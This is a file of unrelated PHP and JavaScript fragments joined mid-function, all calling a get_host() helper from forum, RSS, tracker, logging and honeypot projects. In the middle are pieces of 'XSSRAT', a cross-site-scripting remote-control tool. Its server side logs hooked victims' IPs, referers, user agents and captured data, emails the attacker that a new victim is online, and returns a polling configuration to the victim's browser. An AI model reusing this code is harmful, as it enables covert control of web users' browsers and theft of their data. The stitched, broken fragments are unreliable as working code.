function wpi_get_comment_author()
{
if (get_comment_type() != 'comment') {
$author = get_host(get_comment_author_url());
$author = str_rem("www.", $author);
} else {
$author = get_comment_author();
}
return $author;
}
function sync()
{
$this->post_stamp = __request_timestamp__;
$this->ip_addr = get_ip();
$this->host_name = $GLOBALS['FUD_OPT_1'] & 268435456 ? "'" . addslashes(get_host($this->ip_addr)) . "'" : 'NULL';
list($this->foff, $this->length) = write_pmsg_body($this->body);
q("UPDATE phpgw_fud_pmsg SET\n\t\t\tto_list=" . strnull(addslashes($this->to_list)) . ",\n\t\t\ticon=" . strnull($this->icon) . ",\n\t\t\touser_id=" . $this->ouser_id . ",\n\t\t\tduser_id=" . $this->ouser_id . ",\n\t\t\tpost_stamp=" . $this->post_stamp . ",\n\t\t\tsubject='" . addslashes($this->subject) . "',\n\t\t\tip_addr='" . $this->ip_addr . "',\n\t\t\thost_name=" . $this->host_name . ",\n\t\t\tattach_cnt=" . (int) $this->attach_cnt . ",\n\t\t\tfldr=" . $this->fldr . ",\n\t\t\tfoff=" . (int) $this->foff . ",\n\t\t\tlength=" . (int) $this->length . ",\n\t\t\tpmsg_opt=" . $this->pmsg_opt . "\n\t\tWHERE id=" . $this->id);
if ($this->fldr == 3) {
$this->send_pmsg();
}
}
function testsuit($servername = 'localhost')
{
header('Content-Type:text/html;charset=utf-8 ');
$this->load->helper('html');
$host = get_host($servername);
$linkPrepend = 'http://localhost/kq/index.php/kqtest/';
$apiLink = array('test_dcoupon', 'test_error_log', 'test_remote_coupon_accepted', 'test_coupon_dincrement', 'test_acoupon_increment', 'test_accept_coupon', 'test_bind_card_sms');
$apiTitle = $apiLink;
foreach ($apiLink as $link) {
$newApiLink[] = $linkPrepend . $link . '/' . $servername;
}
$data['title'] = '系统内部测试套装';
$data['titles'] = $apiTitle;
$data['links'] = $newApiLink;
$this->load->view('vtestsuit', $data);
}
function toolsuit($servername = 'localhost')
{
header('Content-Type:text/html;charset=utf-8 ');
$host = get_host($servername);
$linkPrepend = $host . '/kq/index.php/kqunionpaytools/';
// $apiTitle = array('re','用户信息查询','银行卡开通服务','银行卡关闭服务');
$apiLink = array('testGetUserByMobile', 'testRegByMobile', 'testBindCard', 'testUnbindCard', 'testCouponDwnById');
$apiTitle = $apiLink;
foreach ($apiLink as $link) {
$newApiLink[] = $linkPrepend . $link . '/' . $servername;
}
$data['title'] = '银联接口工具套装';
$data['titles'] = $apiTitle;
$data['links'] = $newApiLink;
$this->load->view('vtestsuit', $data);
}
public function __construct()
{
$sql = 'SELECT *
FROM _config';
$this->config = sql_rowset($sql, 'config_name', 'config_value');
if ($this->v('site_disable')) {
exit('not_running');
}
$address = $this->v('site_address');
$host_addr = array_key(explode('/', array_key(explode('//', $address), 1)), 0);
if ($host_addr != get_host()) {
$allow_hosts = get_file(XFS . XCOR . 'store/domain_alias');
foreach ($allow_hosts as $row) {
if (substr($row, 0, 1) == '#') {
continue;
}
$remote = strpos($row, '*') === false;
$row = !$remote ? str_replace('*', '', $row) : $row;
$row = str_replace('www.', '', $row);
if ($row == get_host()) {
$sub = str_replace($row, '', get_host());
$sub = f($sub) ? $sub . '.' : ($remote ? 'www.' : '');
$address = str_replace($host_addr, $sub . $row, $address);
$this->v('site_address', $address, true);
break;
}
}
}
if (strpos($address, 'www.') !== false && strpos(get_host(), 'www.') === false && strpos($address, get_host())) {
$page_protocol = array_key(explode('//', _page()), 0);
$a = $this->v('site_address') . str_replace(str_replace('www.', '', $page_protocol . $address), '', _page());
redirect($a, false);
}
$this->cache_dir = XFS . XCOR . 'cache/';
if (is_remote() && @file_exists($this->cache_dir) && @is_writable($this->cache_dir) && @is_readable($this->cache_dir)) {
$this->cache_f = true;
}
//
// Load additional objects.
//
$this->email = _import('emailer');
$this->cache = _import('cache');
return;
}
function add($forum_id, $message_threshold, $forum_opt, $perm, $autoapprove = true)
{
if (!$this->post_stamp) {
$this->post_stamp = __request_timestamp__;
}
if (!isset($this->ip_addr)) {
$this->ip_addr = get_ip();
}
$this->host_name = $GLOBALS['FUD_OPT_1'] & 268435456 ? "'" . addslashes(get_host($this->ip_addr)) . "'" : 'NULL';
$this->thread_id = isset($this->thread_id) ? $this->thread_id : 0;
$this->reply_to = isset($this->reply_to) ? $this->reply_to : 0;
$file_id = write_body($this->body, $length, $offset);
/* determine if preview needs building */
if ($message_threshold && $message_threshold < strlen($this->body)) {
$thres_body = trim_html($this->body, $message_threshold);
$file_id_preview = write_body($thres_body, $length_preview, $offset_preview);
} else {
$file_id_preview = $offset_preview = $length_preview = 0;
}
poll_cache_rebuild($this->poll_id, $poll_cache);
$poll_cache = $poll_cache ? @serialize($poll_cache) : null;
$this->id = db_qid("INSERT INTO phpgw_fud_msg (\n\t\t\tthread_id,\n\t\t\tposter_id,\n\t\t\treply_to,\n\t\t\tip_addr,\n\t\t\thost_name,\n\t\t\tpost_stamp,\n\t\t\tsubject,\n\t\t\tattach_cnt,\n\t\t\tpoll_id,\n\t\t\ticon,\n\t\t\tmsg_opt,\n\t\t\tfile_id,\n\t\t\tfoff,\n\t\t\tlength,\n\t\t\tfile_id_preview,\n\t\t\toffset_preview,\n\t\t\tlength_preview,\n\t\t\tmlist_msg_id,\n\t\t\tpoll_cache\n\t\t) VALUES(\n\t\t\t" . $this->thread_id . ",\n\t\t\t" . $this->poster_id . ",\n\t\t\t" . (int) $this->reply_to . ",\n\t\t\t'" . $this->ip_addr . "',\n\t\t\t" . $this->host_name . ",\n\t\t\t" . $this->post_stamp . ",\n\t\t\t" . strnull(addslashes($this->subject)) . ",\n\t\t\t" . (int) $this->attach_cnt . ",\n\t\t\t" . (int) $this->poll_id . ",\n\t\t\t" . strnull(addslashes($this->icon)) . ",\n\t\t\t" . $this->msg_opt . ",\n\t\t\t" . $file_id . ",\n\t\t\t" . (int) $offset . ",\n\t\t\t" . (int) $length . ",\n\t\t\t" . $file_id_preview . ",\n\t\t\t" . $offset_preview . ",\n\t\t\t" . $length_preview . ",\n\t\t\t" . strnull($this->mlist_msg_id) . ",\n\t\t\t" . strnull(addslashes($poll_cache)) . "\n\t\t)");
$thread_opt = (int) ($perm & 4096 && isset($_POST['thr_locked']));
if (!$this->thread_id) {
/* new thread */
if ($perm & 64 && isset($_POST['thr_ordertype'], $_POST['thr_orderexpiry'])) {
if ((int) $_POST['thr_ordertype']) {
$thread_opt |= (int) $_POST['thr_ordertype'];
$thr_orderexpiry = (int) $_POST['thr_orderexpiry'];
}
}
$this->thread_id = th_add($this->id, $forum_id, $this->post_stamp, $thread_opt, isset($thr_orderexpiry) ? $thr_orderexpiry : 0);
q('UPDATE phpgw_fud_msg SET thread_id=' . $this->thread_id . ' WHERE id=' . $this->id);
} else {
th_lock($this->thread_id, $thread_opt & 1);
}
if ($autoapprove && $forum_opt & 2) {
$this->approve($this->id, true);
}
return $this->id;
}
function get_args($argv, $port, $team, $host)
{
$i = 0;
while ($argv[$i]) {
if ($argv[$i] == "-n" && isset($argv[$i + 1]) == TRUE) {
if (($team = get_team_name($argv[$i + 1])) == -1) {
return FALSE;
}
}
if ($argv[$i] == "-p" && isset($argv[$i + 1]) == TRUE) {
if (($port = get_port($argv[$i + 1])) == -1) {
return FALSE;
}
}
if ($argv[$i] == "-h" && isset($argv[$i + 1])) {
if (($host = get_host($argv[$i + 1])) == -1) {
return FALSE;
}
}
$i++;
}
return TRUE;
}
function add_channel($url, $folderid = 0, $title_ = null, $descr_ = null, $tags = null)
{
if (!$url || strlen($url) <= 7) {
return array(-2, "Invalid URL {$url}");
}
if (!is_numeric($folderid)) {
return array(-2, "Invalid folderid {$folderid}");
}
$url = sanitize(str_replace('&', '&', $url), RSS_SANITIZER_URL);
$urlDB = rss_real_escape_string($url);
//htmlentities($url);
$res = rss_query("select count(*) as channel_exists from " . getTable("channels") . " where url='{$urlDB}'");
list($channel_exists) = rss_fetch_row($res);
if ($channel_exists > 0) {
// fatal
return array(-2, "Looks like you are already subscribed to this channel");
}
$res = rss_query("select 1+max(position) as np from " . getTable("channels"));
list($np) = rss_fetch_row($res);
if (!$np) {
$np = "0";
}
// Here we go!
//error_reporting(E_ALL);
$old_level = error_reporting(E_ERROR);
$rss = fetch_rss($url);
error_reporting($old_level);
if ($rss) {
if ($title_) {
$title = rss_real_escape_string($title_);
} elseif (is_object($rss) && array_key_exists('title#', $rss->channel)) {
if (array_key_exists('title', $rss->channel)) {
$title = rss_real_escape_string($rss->channel['title']);
} else {
$title = " ";
}
} else {
$title = "";
}
if (is_object($rss) && array_key_exists('link', $rss->channel)) {
$siteurl = rss_real_escape_string(htmlentities($rss->channel['link']));
} else {
$siteurl = "";
}
$refreshinterval = 0;
if (is_object($rss) && array_key_exists('syn', $rss->channel)) {
$syn = $rss->channel['syn'];
if (array_key_exists('updateperiod', $syn)) {
if ("hourly" == $syn['updateperiod']) {
if (array_key_exists('updatefrequency', $syn)) {
$refreshinterval = 60 * $syn['updatefrequency'];
}
}
}
}
if ($descr_) {
$descr = rss_real_escape_string($descr_);
} elseif (is_object($rss) && array_key_exists('description', $rss->channel)) {
$descr = rss_real_escape_string($rss->channel['description']);
} else {
$descr = "";
}
//lets see if this server has a favicon
$icon = "";
if (getConfig('rss.output.showfavicons')) {
// if we got nothing so far, lets try to fall back to
// favicons
if ($icon == "" && $siteurl != "") {
$match = get_host($siteurl, $host);
$uri = "http://" . $host . "favicon.ico";
if ($match && getContentType($uri, $contentType)) {
if (preg_match("/image\\/x-icon/", $contentType)) {
$icon = $uri;
}
}
}
}
$private = preg_match('|(https?://)([^:]+:[^@]+@)(.+)$|', $url);
if ($title != "") {
$title = strip_tags($title);
$descr = strip_tags($descr);
// add channel to root folder by default
if (!$folderid) {
$folderid = getRootFolder();
}
list($title, $urlDB, $siteurl, $folderid, $descr, $icon) = rss_plugin_hook('rss.plugins.feed.new', array($title, $urlDB, $siteurl, $folderid, $descr, $icon));
$mode = RSS_MODE_UNREAD_STATE;
if ($private) {
$mode |= RSS_MODE_PRIVATE_STATE;
}
$sql = "insert into " . getTable("channels") . " (title, url, siteurl, parent, descr, dateadded, icon, position, mode, daterefreshed)" . " values ('{$title}', '{$urlDB}', '{$siteurl}', {$folderid}, '{$descr}', now(), '{$icon}', {$np}, {$mode}, '0000-00-00 00:00:00')";
rss_query($sql);
$newid = rss_insert_id();
if ($icon && cacheFavicon($icon)) {
rss_query("update " . getTable("channels") . " set icon='blob:" . $icon . "'" . " where id={$newid}");
}
if ($tags != "") {
__exp__submitTag($newid, $tags, "'channel'");
}
if (false == empty($refreshinterval)) {
setProperty($newid, 'rss.config.refreshinterval', $refreshinterval);
}
return array($newid, "");
} else {
// non-fatal, will look further
return array(-1, "I'm sorry, I couldn't extract a valid RSS feed from <a href=\"{$url}\">{$url}</a>.");
}
} else {
global $MAGPIE_ERROR;
$retError = "I'm sorry, I couldn't retrieve <a href=\"{$url}\">{$url}</a>.";
if ($MAGPIE_ERROR) {
$retError .= "\n<br />{$MAGPIE_ERROR}\n";
}
// non-fatal, will look further
return array(-1, $retError);
}
}
if (!defined('ACT')) {
define('ACT', $_temp_act);
}
/* --- START: ERROR REPORTING --- */
if (!defined('ENVIRONMENT')) {
define('ENVIRONMENT', $environment);
}
if (ENVIRONMENT == '1') {
error_reporting(E_ALL);
} else {
if (ENVIRONMENT == '2') {
error_reporting(0);
}
}
/* --- DOMAIN NAME --- */
$_global_domain = get_host();
if ($_global_domain === 'localhost') {
$_global_domain = $_global_domain . '-' . cleanurl($_global_general->website_title);
} else {
$_global_domain = cleanurl($_global_general->website_title);
}
if (!defined('DOMAIN_ADDRESS')) {
define('DOMAIN_ADDRESS', $_global_domain);
}
/* --- ENVIRONMENT URL --- */
$_base_url_environment = substr(strchr(BASE_URL, '/'), 2, 9);
if (!defined('URL_ENVIRONMENT')) {
define('URL_ENVIRONMENT', $_base_url_environment);
}
/* --- ADMIN DEFAULT PAGE --- */
if (!defined('DEFAULT_PAGE')) {
function core()
{
$sql = 'SELECT *
FROM _config';
$this->config = _rowset($sql, 'config_name', 'config_value');
if ($this->v('site_disabled')) {
exit('SITE DISABLED');
}
$address = $this->v('address');
$host_addr = array_key(explode('/', array_key(explode('://', $address), 1)), 0);
if ($host_addr != get_host()) {
$allow_hosts = get_file('./base/domain_alias');
foreach ($allow_hosts as $row) {
if (substr($row, 0, 1) == '#') {
continue;
}
$remote = strpos($row, '*') === false;
$row = !$remote ? str_replace('*', '', $row) : $row;
$row = str_replace('www.', '', $row);
if ($row == get_host()) {
$sub = str_replace($row, '', get_host());
$sub = f($sub) ? $sub . '.' : ($remote ? 'www.' : '');
$address = str_replace($host_addr, $sub . $row, $address);
$this->v('address', $address, true);
break;
}
}
}
if (strpos($address, 'www.') !== false && strpos(get_host(), 'www.') === false && strpos($address, get_host())) {
$a = $this->v('address') . str_replace(str_replace('www.', '', $address), '', _page());
redirect($a, false);
}
$this->cache_dir = XFS . 'core/cache/';
if (is_remote() && @file_exists($this->cache_dir) && @is_writable($this->cache_dir) && @is_readable($this->cache_dir)) {
$this->cache_f = true;
}
return;
}
fail("We have no record of that computer");
}
return $host;
}
$user = get_logged_in_user();
page_head("Merge computer records");
$nhosts = get_int("nhosts");
$hostid = get_int("id_0");
$latest_host = get_host($hostid, $user);
for ($i = 1; $i < $nhosts; $i++) {
$var = "id_{$i}";
$hostid = get_int($var, true);
if (!$hostid) {
continue;
}
$host = get_host($hostid, $user);
if ($host->create_time > $latest_host->create_time) {
$error = merge_hosts($latest_host, $host);
if ($error) {
echo "<br />{$error}\n";
continue;
}
$latest_host = $host;
} else {
merge_hosts($host, $latest_host);
}
// reread latest_host from database since we just
// updated its credits
//
$latest_host = BoincHost::lookup_id($latest_host->id);
}
$res = $project->getProjectByTicket($ticket);
if ($res) {
$pmd->ticket = $ticket;
$pmd->p_id = $project->id;
$pmd->clientIP = htmlspecialchars(quotes($ip));
$pmd->time = $curtime;
$pmd->status = 1;
$pmd->ec = $ec;
$pmd->userAgent = htmlspecialchars(quotes($useragent));
$pmd->Referer = htmlspecialchars(quotes($referer));
$pmd->Data = utf8_decode(urldecode($data));
$pmd_id = $pmd->addPMD();
}
}
$email = $project->getMailByTiket($ticket);
if ($email) {
//sea maill
$saemail = new SaeMail();
$message = "亲爱的用户,你有新用户上线了。\r\n\t\t\t\t\t\t\t\r\n\tIP:" . $pmd->clientIP . "\r\n\tReferer:" . $pmd->Referer . "\r\n\tuserAgent:" . $pmd->userAgent . "\r\n\t\r\n\t本邮件来自于: http://xssrat.sinaapp.com\r\n\tMak3 hack m0r3 c00l!";
$ret = $saemail->quickSend($email, 'XSSRAT - 新用户上线', $message, MAIL_ACCOUNT, MAIL_PASS);
if ($ret === false) {
$log->error($mail->errmsg());
}
}
}
$db->closeDB();
}
$net_config = "rat.net.config = { protocol:\"" . get_protocol() . "\"," . "port:" . get_port() . ",host:\"" . get_host() . "\",api_path:\"" . get_page_path() . "\"," . "interval:3000,ticket:\"" . htmlspecialchars($ticket) . "\",pmd_id:\"" . $pmd_id . "\",a_id:0};\n";
$log->info("Time:" . $curtime . " IP:" . $ip . " UA:" . $useragent . " RE:" . $referer . " DATA:" . $data);
die($net_config);
}
?>
</a></h2>
<table width="100%">
<tr class="colhead">
<td>Changed</td>
<td>IP [<a href="/userhistory.php?action=ips&userid=<?php
echo $UserID;
?>
">H</a>]</td>
</tr>
<? while(list($ChangeTime, $ChangerIP) = $DB->next_record()){ ?>
<tr class="rowa">
<td><?php
echo time_diff($ChangeTime);
?>
</td>
<td><?php
echo display_str($ChangerIP);
?>
[<a href="/user.php?action=search&ip_history=on&ip=<?php
echo display_str($ChangerIP);
?>
" title="Search">S</a>]<br /><?php
echo get_host($ChangerIP);
?>
</td>
</tr>
<? } ?>
</table>
<? show_footer(); ?>
$UsersEnabled = explode('|', $UsersEnabled);
$UsersDonor = explode('|', $UsersDonor);
$UsersWarned = explode('|', $UsersWarned);
}
?>
<tr class="rowa">
<td>
<?php
echo $IP;
?>
(<?php
echo get_cc($IP);
?>
) <br />
<?php
echo get_host($IP);
?>
<?php
echo $HasDupe ? '<a href="#" onclick="ShowIPs(' . $Index . '); return false;">(' . count($UserIDs) . ')</a>' : '(0)';
?>
</td>
<td><?php
echo time_diff($StartTime);
?>
</td>
<td><?php
echo time_diff($EndTime);
?>
</td>
<td><?php
//time_diff(strtotime($StartTime), strtotime($EndTime));
array_push($log, $bLogLine);
$bLogLine = implode('', $log);
$fp = fopen($file, 'w');
}
fputs($fp, $bLogLine);
fclose($fp);
}
return;
}
}
}
/* Don't execute in Manager */
if ($modx->context->get('key') == 'mgr') {
return '';
}
$oldSetting = ignore_user_abort(TRUE);
// otherwise can screw-up logfile
$data['page'] = $_SERVER['REQUEST_URI'];
$t = gettimeofday();
$data['time'] = date('d/m/y H:i:s:') . substr($t['usec'], 0, 3);
// H:i:s:u
$data['ip'] = $_SERVER['REMOTE_ADDR'];
$data['userAgent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '<unknown user agent>';
$data['host'] = get_host($data['ip']);
$data['referer'] = empty($_SERVER['HTTP_REFERER']) ? '(empty)' : $_SERVER['HTTP_REFERER'];
$msg = implode('`', $data);
$maxLines = $modx->getOption('log_max_lines', $scriptProperties, 300);
$file = MODX_CORE_PATH . 'logs/pagenotfound.log';
logLine($msg . "\n", $maxLines, $file);
ignore_user_abort($oldSetting);
return '';
/**
* Returns an array of URL and URI data
*
* @author Kader Bouyakoub <*****@*****.**>
* @link @bkader <github>
* @link @KaderBouyakoub <twitter>
*
* @access public
* @param void
* @return array
*/
function urlinfo()
{
if (!function_exists('path_merge')) {
$CI =& get_instance();
$CI->load->helper('path');
}
$is_https = is_https();
$server_protocol = is_https() ? 'https' : 'http';
$server_name = get_host();
if (isset($_SERVER['SERVER_PORT']) and !(strpos($server_name, '::') === false ? strpos($server_name, ':') === false : strpos($server_name, ']:') === false) and ($server_protocol == 'http' and $_SERVER['SERVER_PORT'] != 80) || ($server_protocol == 'https' and $_SERVER['SERVER_PORT'] != 443)) {
$server_name_extra = $server_name . ':' . $_SERVER['SERVER_PORT'];
$port = (int) $_SERVER['SERVER_PORT'];
} else {
$server_name_extra = $server_name;
$port = $is_https ? 443 : 80;
}
$server_url = $server_protocol . '://' . $server_name_extra;
$script_name = $_SERVER['SCRIPT_NAME'];
$script_path = str_replace(basename($script_name), '', $script_name);
if (defined('FCPATH')) {
$base_url = $server_url . rtrim(preg_replace('/' . preg_quote(str_replace(FCPATH, '', path_merge(FCPATH, $script_path) . '/'), '/') . '$/', '', $script_path), '/') . '/';
} else {
$base_url = $server_url . '/';
}
$base_uri = parse_url($base_url, PHP_URL_PATH);
if (substr($base_uri, 0, 1) != '/') {
$base_uri = '/' . $base_uri;
}
if (substr($base_uri, -1, 1) != '/') {
$base_uri .= '/';
}
$current_uri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '/';
$current_url = $server_url . $current_uri;
$server_url .= '/';
$current_uri_string = parse_url($current_url, PHP_URL_PATH);
$current_query_string = parse_url($current_url, PHP_URL_QUERY);
return compact('base_url', 'base_uri', 'current_url', 'current_uri', 'current_uri_string', 'current_query_string', 'server_url', 'server_name', 'server_protocol', 'is_https', 'script_name', 'script_path', 'port');
}
function check_pathinfo()
{
$host = get_host();
$port = get_port();
$uri = strtolower(get_schema()) . '://' . get_host() . get_request_uri() . '/pathinfotest?check_path_info=1';
$content = '';
$host_addr_arr = array($host, '127.0.0.1', 'localhost');
foreach ($host_addr_arr as $host_addr) {
$fp = @fsockopen($host_addr, $port, $errno, $errstr, 2);
if ($fp) {
$out = "GET " . $uri . " HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "Connection: close\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp) && strlen($content) < 512) {
$content .= fgets($fp, 128);
}
fclose($fp);
}
$content = preg_split("\r?\n\r?\n", $content);
if (strpos($content[1], 'SUPPORT_PATHINFO') !== false) {
return true;
}
}
if (function_exists('curl_init')) {
ob_start();
$fp = curl_init($uri);
curl_exec($fp);
curl_close($fp);
$str = ob_get_contents();
ob_end_clean();
return $str == 'SUPPORT_PATHINFO' ? true : false;
} else {
return false;
}
}
function _page()
{
return get_protocol() . get_host() . ((!empty($_SERVER['REQUEST_URI'])) ? $_SERVER['REQUEST_URI'] : '');
}
<?php
// require_once(dirname(__FILE__).'/../okdk/locale/class.Locale.php');
//-----------------------------------------------------------------------
/* Language */
//-----------------------------------------------------------------------
define("DEFAULT_LANGUAGE", LocaleOkdk::LANGUAGE_ENGLISH);
define("USE_BROWSER_LANGUAGE", true);
//-----------------------------------------------------------------------
/* Others */
//-----------------------------------------------------------------------
define("SITE_VERSION", 20101110);
define("TOP_DOMAIN", get_host($_SERVER['SERVER_NAME']));
//-----------------------------------------------------------------------
/* Utils */
//-----------------------------------------------------------------------
function get_host($address)
{
$parseUrl = parse_url(trim($address));
return trim(isset($parseUrl['host']) ? $parseUrl['host'] : $parseUrl['path']);
}
</td>
<td><?php
echo time_diff($Invite['AccountAge']);
?>
</td>
<td>
<?php
echo display_str($Invite['IP']);
?>
(<?php
echo get_cc($Invite['IP']);
?>
) [<a href="user.php?action=search&ip_history=on&ip=<?php
echo display_str($Invite['IP']);
?>
" title="Search">S</a>]<br />
<?php
echo get_host($Invite['IP']);
?>
</td>
</tr>
<?php
if ($Matches) {
echo $Matches;
}
?>
</table>
</div>
<?php
show_footer();
function test_my_downloadedCoupons($servername)
{
$host = get_host($servername);
$url = $host . '/kq/index.php/kqapi6/myDownloadedCoupon';
// $url.='/districtId/13';
// $url.='/shopTypeId/1';
$url .= '/uid/57';
$response = get($url);
echo $response;
}
if(ua.search(MobileEsp.deviceNintendo) > -1) { return "Nintendo"};
if(MobileEsp.DetectXbox()) { return "Xbox"};
if(this.isLaptop()) { return "Laptop"};
if(this.isVirtualMachine()) { return "Virtual Machine"};
return 'Unknown';
}
};
rat.regCmp('rat.hardware');
<?php
require_once "bin/util/util.php";
$ticket = htmlspecialchars($_GET["t"], ENT_QUOTES, 'UTF-8');
$protocol = get_protocol();
$port = get_port();
$host = get_host();
$api_path = get_page_path() . "/api";
$interval = 3000;
?>
rat.net = {
config:{
protocol:"<?php
echo $protocol;
?>
",// @String http or https
port:<?php
echo $port;
?>
,// @int like 80 or 8080
host:"<?php
echo $host;
<?php
function get_host($ip)
{
$ptr = implode(".", array_reverse(explode(".", $ip))) . ".in-addr.arpa";
$host = dns_get_record($ptr, DNS_PTR);
if ($host == null) {
return $ip;
} else {
return $host[0]['target'];
}
}
print get_host('192.168.1.5');
<td>Registered</td>
</tr>
<?php
while (list($UserID, $IP, $Username, $PermissionID, $Enabled, $Donor, $Warned, $Joined, $Uses) = $DB->next_record()) {
$Row = $Row == 'b' ? 'a' : 'b';
?>
<tr class="row<?php
echo $Row;
?>
">
<td><?php
echo format_username($UserID, $Username, $Donor, $Warned, $Enabled, $PermissionID);
?>
</td>
<td><span style="float:left;"><?php
echo get_host($IP) . " ({$IP})";
?>
</span><span style="float:right;">[<a href="userhistory.php?action=ips&userid=<?php
echo $UserID;
?>
" title="History">H</a>|<a href="user.php?action=search&ip_history=on&ip=<?php
echo display_str($IP);
?>
" title="Search">S</a>]</span></td>
<td><?php
echo display_str($Uses);
?>
</td>
<td><?php
echo time_diff($Joined);
?>
if ($kk % 2 == 0) {
if (preg_match("/(\\w+)\\[(\\w+)\\]/", $vv, $matches)) {
$_GET[$matches[1]][$matches[2]] = $ext_param[$kk + 1];
} else {
$_GET[$ext_param[$kk]] = $ext_param[$kk + 1];
}
if ($ext_param[$kk] != "p") {
$current_url .= $ext_param[$kk];
$current_url .= "-" . $ext_param[$kk + 1] . "-";
}
}
}
}
}
$current_url = substr($current_url, -1) == "-" ? substr($current_url, 0, -1) : $current_url;
$domain = get_host();
if (strpos($domain, "." . app_conf("DOMAIN_ROOT"))) {
$sub_domain = str_replace("." . app_conf("DOMAIN_ROOT"), "", $domain);
if ($sub_domain != '') {
$_GET['sub_domain'] = $sub_domain;
}
}
}
unset($_REQUEST['rewrite_param']);
unset($_GET['rewrite_param']);
//引入时区配置及定义时间函数
if (function_exists('date_default_timezone_set')) {
date_default_timezone_set(app_conf('DEFAULT_TIMEZONE'));
}
//end 引入时区配置及定义时间函数
if (file_exists(APP_ROOT_PATH . "public/runtime/~core.php")) {
function _page()
{
return get_protocol() . get_host() . v_server('REQUEST_URI');
}
function set_cookie_send_mail()
{
global $cookie, $current_page;
// first set
if (!isset($cookie->user_agent)) {
$cookie->user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
}
if (!isset($cookie->referer)) {
$cookie->referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
}
if (!isset($cookie->from_count)) {
$cookie->from_count = 1;
}
// fix:clear cookie and login not create customer
if (!isset($cookie->customer_id) && isset($_SESSION['customer_id']) && (int) $_SESSION['customer_id'] > 0) {
$cookie->customer_id = (int) $_SESSION['customer_id'];
}
$cookie->account_level = get_account_level();
$is_iphone = get_iphone();
if ($is_iphone == true) {
if (!isset($cookie->send_email)) {
// first
$cookie->send_email = 1;
}
}
if (!isset($cookie->send_email) && !allow_brower()) {
$cookie->send_email = 0;
}
if (!isset($_SERVER['HTTP_REFERER']) || strstr($_SERVER['HTTP_REFERER'], get_host())) {
if ($cookie->send_email == 1) {
if ($cookie->customer_id) {
// customer existing
if (!check_can_send_customer($cookie->customer_id)) {
$cookie->send_email = 0;
}
}
} else {
$cookie->send_email = 0;
}
// don't send email
} else {
$keyword = '';
// confirm from search
$is_from_search = get_search_engine($keyword);
if ($is_from_search) {
// $_SERVER['HTTP_USER_AGENT']
// fix:multi search engine
// first come
if (!isset($cookie->send_email)) {
$cookie->send_email = 1;
} else {
$cookie->from_count = (int) $cookie->from_count + 1;
}
// is search update it
$cookie->user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
$cookie->referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$cookie->first_page = $_GET['main_page'];
}
$cookie->search_keyword = $keyword;
}
if ($cookie->send_email == 1) {
filter_first();
}
// FIX: can't send cookie
$cookie->write();
}
public function printShockpotGeoData()
{
$db_query = "SELECT source_ip, COUNT(source_ip) AS count\n FROM connections\n GROUP BY source_ip\n ORDER BY COUNT(source_ip) DESC\n LIMIT 10 ";
$rows = R::getAll($db_query);
if (count($rows)) {
//We create a new vertical bar chart, a new pie chart and initialize the dataset
$verticalChart = new VerticalBarChart(600, 300);
$pieChart = new PieChart(600, 300);
$dataSet = new XYDataSet();
//We create a "intensity" pie chart as well along with a dataset
$intensityPieChart = new PieChart(600, 300);
$intensityDataSet = new XYDataSet();
//We create a new Google Map and initialize its columns,
//where the decoded geolocation data will be entered in the format
//of Lat(number), Lon(number) and IP(string)
$gMapTop10 = new QMapGoogleGraph();
$gMapTop10->addColumns(array(array('number', 'Lat'), array('number', 'Lon'), array('string', 'IP')));
//We create a new Intensity Map and initialize its columns,
//where the decoded geolocation data will be entered in the format
//of Country(2 letter string), #Probes(number)
$intensityMap = new QIntensitymapGoogleGraph();
$intensityMap->addDrawProperties(array("title" => 'IntensityMap'));
$intensityMap->addColumns(array(array('string', '', 'Country'), array('number', '#Probes', 'a')));
//We create a temporary table in the database where we will store the IPs along with their #probes
//and the corresponding country code, otherwise the Intensity Map won't work, because we need to
//GROUP BY country code and SUM the #Probers per country
$temp_table = 'CREATE TEMPORARY TABLE temp_ip (ip TEXT, counter INTEGER, country TEXT)';
R::exec($temp_table);
//We create a dummy counter to use for the markers' tooltip inside Google Map like: IP 3/10
//We use the same counter for the IP <table> as well
$counter = 1;
//We create a skeleton for the table
echo '<p>The following table displays the top 10 IP addresses connected to the system (ordered by volume of connections).</p>';
echo '<table><thead>';
echo '<tr class="dark">';
echo '<th>ID</th>';
echo '<th>IP Address</th>';
echo '<th>Probes</th>';
echo '<th>City</th>';
echo '<th>Region</th>';
echo '<th>Country Name</th>';
echo '<th>Code</th>';
echo '<th>Latitude</th>';
echo '<th>Longitude</th>';
echo '<th>Hostname</th>';
echo '<th colspan="9">IP Lookup</th>';
echo '</tr></thead><tbody>';
//We need to add data on the correct Map columns. The columns are always 0 or 1 or 2 for every repetition
//so we can hardcode it into our code, but we need a way to automatically increase the row index. So we
//create a dummy index variable to be increased after every repetition (as many db results we have)
$col = 0;
//For every row returned from the database...
foreach ($rows as $row) {
//We create a new GeoDataObject which geolocates the IP address
$geodata = new GeoDataObject($this, $row['source_ip']);
//We prepare the label for our vertical bar chart and add the point
$label = $row['source_ip'] . " - " . $geodata->countryCode;
$dataSet->addPoint(new Point($label, $row['count']));
//We next prepare the marker's tooltip inside Google Map
$tooltip = "<strong>TOP {$counter}/10:</strong> " . $row['source_ip'] . "<br />" . "<strong>Probes:</strong> " . $row['count'] . "<br />" . "<strong>City:</strong> " . $geodata->city . "<br />" . "<strong>Region:</strong> " . $geodata->region . "<br />" . "<strong>Country:</strong> " . $geodata->countryName . "<br />" . "<strong>Latitude:</strong> " . $geodata->latitude . "<br />" . "<strong>Longitude:</strong> " . $geodata->longitude . "<br />";
//And add the marker to the map
$gMapTop10->setValues(array(array($col, 0, (double) $geodata->latitude), array($col, 1, (double) $geodata->longitude), array($col, 2, $tooltip)));
//We prepare the data that will be inserted in our temporary table
$ip = $row['source_ip'];
$ip_count = $row['count'];
$country_code = $geodata->countryCode;
$country_query = "INSERT INTO temp_ip VALUES('{$ip}', '{$ip_count}', '{$country_code}')";
R::exec($country_query);
//For every row returned from the database we create a new table row with the data as columns
echo '<tr class="light">';
echo '<td>' . $counter . '</td>';
